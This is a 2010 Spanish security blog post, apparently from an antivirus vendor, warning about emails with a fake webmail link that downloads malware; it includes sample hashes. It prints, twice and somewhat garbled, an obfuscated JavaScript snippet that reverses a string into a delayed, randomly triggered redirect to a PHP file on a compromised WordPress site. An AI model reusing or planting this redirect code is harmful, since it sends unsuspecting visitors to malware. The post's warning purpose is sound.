Una nueva y picaresca manera de llegar los virus e infectarnos, esta vez con un viejo conocido, pero que lo pueden hacer con cualquiera

Publicado el 27 agosto 2010 ¬ 12:15 pmh.mscComentarios desactivados en Una nueva y picaresca manera de llegar los virus e infectarnos, esta vez con un viejo conocido, pero que lo pueden hacer con cualquiera

Una nueva manera, hasta ahora desconocida, nos ha sorprendido en los mails recibidos hoy, y es el mensaje en un recuadro ofreciendonos un supuesto link si no vemos bien el mensaje …:

____________________________________________________

if the message will not displayed automatically,
follow the link to read delivered message.

Received message is available at

www <servidor correo usuario>/inbox/virus/read.php?sessionid-182


____________________________________________________

que realmente es un falso enlace que contiene un MIME con el fichero vírico, y que sin necesidad de tener que acceder a ninguna web, simplemente por pinchar en el falso link, descarga el fichero

Asi hemos descargado un

Additional information
$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton>Show all$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton>
MD5   : 3018e99857f31a59e0777396ae634a8f
SHA1  : 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c

El cual ya controlan todos los antivirus, y solo usuarios sin antivirus residente se infectarían, pero el peligro es que usen este método con cualquier nuevo virus…

Y es que, ¿ quien va a pensar que un “link” a su propio servidor de correo, que puede estar en su propia empresa, le descargue un malware …??? Pues ahi queda esto !!!

Mucho cuidado ahi afuera, que nos queda mucho por conocer …

saludos

ms, 27-8-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Sin categoría

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies